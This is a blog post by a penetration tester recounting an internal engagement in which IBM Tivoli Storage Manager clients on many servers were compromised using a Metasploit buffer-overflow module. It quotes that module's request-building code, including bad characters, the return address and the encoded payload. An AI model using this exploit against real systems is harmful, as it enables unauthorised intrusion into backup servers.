Pages

Subscribe:

Penetration testing - [Story of a sucessfull PT on IBM Tivoli Server]

For the past few days I was on a Internal VA/PT project in which I had about a total of 140+ Servers assigned .And time was incredibly less , so a detail analysis on these 140 Servers wasn't possible in a weeks time, so My plans were actually to do a quick Intense Nmap Scan on the targets and analysis the banner first and then to give those target to Nessus for any Hot findings.

My targets were actually DR[Data Recovery] servers so scope of work was PT

The Nmap gave all opened port and service names perfectly , and in that what strike me was almost all the servers were running
IBM Tivoli Storage Manager.

This one is actually an IBM product for protecting your server sensitive data and provide complete data Recovery. How this works is it would be installed on every critical servers who's Back up is necessary and Tivoli Client will move all the Data Daily to a central server and The central server will encrypt the data and keep it all safe, and in case of a data recovery all you have to do is get the backup for the Tivoli server and you are done.

I used to monitor my MSF updates and my stupid brain alerted me abt this products exploit in MSF, so for verifying I did a google search and found that a coooooool exploit was there.
Exploit was released on april-May 2010 so chances are less that the admins would have patched it 
It was IBM Tivoli Storage Manager Client HTTp server GET method buffer overflow. I migrated to my msf directory and opened the script directory and verified the exploit code.


Code:
ibm_tsm_cad_header.rb
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},


sploit = "GET /BACLIENT HTTP/1.1\r\n"
sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
sploit << [target.ret].pack('V') + payload.encoded

print_status("Trying target %s..." % target.name)

sock.put(sploit + "\r\n\r\n")

And its clear form the code that it uses a direct EIP overwirte and that the return address is from the target programs Dll only, so even if anything goes wrong nothing to worry that It will only crash the Vulnerable Application.

So I loaded my msf and fired the exploit on one of the targets wooot woot ......

Awsome now that half of the system have have tivoli Running Double wooooot, now its 0waning time I started owning the systems one by one  trying out different payloads one by one 


And the excitement was that so much server and one cool reliable exploit for all, so pawning was so easy  

Just taught of sharing the Exploit.

And among the targets 5 Servres were AIX and unfortunately MSF dn't had an exploit module for AIX server for this exploit, so wasn't able to verify that on those servers, but if the admins allow me to verify physically then I may try to build the same exploit for AIX nd will share it  .